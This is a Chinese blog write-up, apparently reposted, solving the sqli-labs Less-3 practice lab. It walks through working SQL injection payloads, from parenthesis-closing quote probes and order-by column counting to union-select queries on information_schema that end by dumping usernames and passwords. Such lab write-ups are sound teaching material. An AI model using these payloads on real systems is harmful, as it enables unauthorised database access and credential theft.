当前位置: 首页 > article >正文

[网络安全]sqli-labs Less-3 解题详析

article 2025/1/7 13:40:26

判断注入类型

GET1' and '1'='1,回显如下:
在这里插入图片描述GET1' and '1'='2
在这里插入图片描述没有回显,说明该漏洞类型为GET型单引号字符型注入

判断注入点个数

GET1' order by 2 --+,回显如下:
在这里插入图片描述
由上图可知,sql语法中给$id加上了()
猜测后端语句为SELECT * FROM xx where id=(‘$id’)
故构造GET1') order by 3 --+,此时后端语句为SELECT * FROM xx where id=('1') order by 3 --+')
SELECT * FROM xx where id=('-1') order by 3
GET1') order by 4 --+
在这里插入图片描述

GET1') order by 3 --+
在这里插入图片描述故注入点为3个

查库名

GET-1') union select 1,2,database(); --+
回显库名security
在这里插入图片描述

查表名

-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'; --+

回显四个表名
在这里插入图片描述

查users表的列名

-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'; --+

在这里插入图片描述

查字段

-1') union select 1,group_concat(username),group_concat(password) from security.users; --+

在这里插入图片描述


http://www.kler.cn/a/467789.html

相关文章:

  • 04-spring-理-ApplicationContext的实现
  • 【vue】晋升路线图、蛇形进度条
  • Java虚拟机面试题:内存管理(上)
  • 【three.js】场景搭建
  • 【微服务】2、网关
  • matlab中高精度计算函数vpa与非厄米矩阵本征值的求解
  • vue elementUI Plus实现拖拽流程图,不引入插件,纯手写实现。
  • Vue的data和methods
  • 面试题解,Java中的“字节码”剖析
  • HP 电脑开机黑屏 | 故障判断 | BIOS 恢复 | BIOS 升级
  • 改善 Kibana 中的 ES|QL 编辑器体验
  • 智能工厂的设计软件 应用场景的一个例子: 为AI聊天工具添加一个知识系统 之20 再次重建 之5 项目文件三大部 整“拼”项目文档总述
  • vs 2022 中xml 粘贴为Class 中,序列化出来的xml 的使用
  • 九进制转10进制
  • Git 如何在IDEA中进行使用
  • SAP系统中的标准价、移动平均价是什么?有何区别?物料分类账的优点
  • 基于开发/发布/缺陷分离模型的 Git 分支管理实践20250103
  • Day3 微服务 微服务保护(请求限流、线程隔离、服务熔断)、Sentinel微服务保护框架、分布式事务(XA模式、AT模式)、Seata分布式事务框架
  • 【Redis经典面试题十】热key与大key的问题如何解决?
  • 简述 Spring 的 控制反转(IoC) 和 依赖注入(DI)
  • css 页面组件遮挡
  • 【从零开始入门unity游戏开发之——C#篇42】C#补充知识——随机数(Random)、多种方法实现string字符串拼接、语句的简写
  • 我用AI学Android Jetpack Compose之理解声明式UI
  • Jmeter-性能测试工具的安装教程
  • 计算机网络知识总结-网络安全
  • 如何单独安装 MATLAB 工具箱